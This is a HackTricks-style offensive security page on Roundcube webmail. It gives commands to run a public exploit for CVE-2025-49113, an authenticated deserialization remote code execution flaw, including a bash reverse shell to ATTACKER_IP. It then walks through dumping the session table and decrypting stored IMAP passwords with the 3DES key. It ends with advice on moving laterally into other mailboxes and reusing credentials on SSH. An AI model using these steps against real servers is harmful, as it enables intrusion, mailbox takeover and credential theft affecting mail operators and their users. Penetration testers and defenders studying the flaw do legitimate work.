Roundcube

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Overview

Roundcube is a PHP webmail client commonly exposed on HTTP(S) vhosts (e.g., mail.example.tld). Useful fingerprints:

• HTML source often leaks rcversion (e.g., window.rcmail && rcmail.env.rcversion)
• Default app path in containers/VMs: /var/www/html/roundcube
• Main config: config/config.inc.php

Authenticated RCE via PHP object deserialization (CVE-2025-49113)

Affected versions (per vendor/NVD):

• 1.6.x before 1.6.11
• 1.5.x before 1.5.10

Bug summary

• The _from parameter in program/actions/settings/upload.php is not validated, enabling injection of attacker‑controlled data that Roundcube later unserializes, leading to gadget chain execution and remote code execution in the web context (post‑auth).

Quick exploitation

• Requirements: valid Roundcube credentials and a reachable UI URL (e.g., http://mail.target.tld)
• Public PoC automates session handling, gadget crafting and upload flow

git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit.git
php CVE-2025-49113.php http://mail.target.tld USER PASS CMD

# examples
php CVE-2025-49113.php http://mail.target.tld user 'pass' "id"
# blind timing proof
time php CVE-2025-49113.php http://mail.target.tld user 'pass' "sleep 5"

# reverse shell
nc -nvlp 443
php CVE-2025-49113.php http://mail.target.tld user 'pass' \
  "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'"

Notes

• Output is often blind; use sleep N to validate RCE
• Resulting shell typically runs as www-data; on containerised deployments expect /.dockerenv and 172.17.0.0/16 networking

Post‑exploitation: recover IMAP passwords from Roundcube sessions

Roundcube stores the current user’s IMAP password in the session (database) encrypted with the server‑side 3DES key configured in config.inc.php. With filesystem or DB access on the Roundcube host you can recover plaintext passwords and pivot into other mailboxes/services (SSH reuse is common).

1. Read DB DSN and 3DES key from config

config/config.inc.php typically contains:

$config['db_dsnw'] = 'mysql://roundcube:DB_PASS@localhost/roundcube';
$config['des_key'] = 'rcmail-!24ByteDESkey*Str'; // 24‑byte key (3DES)

2. Connect to DB and dump sessions

mysql -u roundcube -p roundcube
# or: mysql -u roundcube -pDB_PASS roundcube

mysql> SELECT id, created, changed, vars FROM session\G

The session.vars field is a Base64 blob produced by Roundcube’s encrypt(): Base64( IV || 3DES-CBC(plaintext) ). The first 8 bytes after Base64‑decoding are the IV.

3. Locate the password field

A quick way to spot the credential inside the decrypted structure is to first Base64‑decode the vars field and eyeball serialized entries:

echo 'BASE64_FROM_VARS' | base64 -d | tr ';' '\n' | grep -i password

4. Decrypt using Roundcube’s helper

Roundcube ships a CLI that uses the same rcmail->decrypt() logic and the configured des_key:

cd /var/www/html/roundcube
./bin/decrypt.sh CIPHERTEXT_BASE64
# -> prints plaintext

5. Manual 3DES-CBC decryption (optional)

• Ciphertext format: Base64( IV(8B) || CT )
• Alg: 3DES-CBC, key length 24B, PKCS#7 padding

from base64 import b64decode
iv_ct = b64decode('hcVCSNXOYgUXvhArn1a1OHJtDck+CFME')
iv, ct = iv_ct[:8], iv_ct[8:]
print(iv.hex(), ct.hex())
# decrypt(ct) with key = $config['des_key'], IV = iv

Common locations

• DB table: session (users table maps login names to IDs)
• Config path: /var/www/html/roundcube/config/config.inc.php

Operational use

• Older session rows often contain prior users’ IMAP passwords; decrypt multiple entries to laterally move into other mailboxes
• Try recovered credentials against SSH or other services if credential reuse is suspected

References

• Roundcube security updates 1.6.11 and 1.5.10
• CVE-2025-49113 – NVD
• FearsOff research notes on Roundcube deserialization/RCE
• hakaioffsec/CVE-2025-49113-exploit (PoC)
• Roundcube bin/decrypt.sh helper
• HTB Outbound – 0xdf write‑up (Roundcube 1.6.10 → RCE → session decrypt pivot)

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.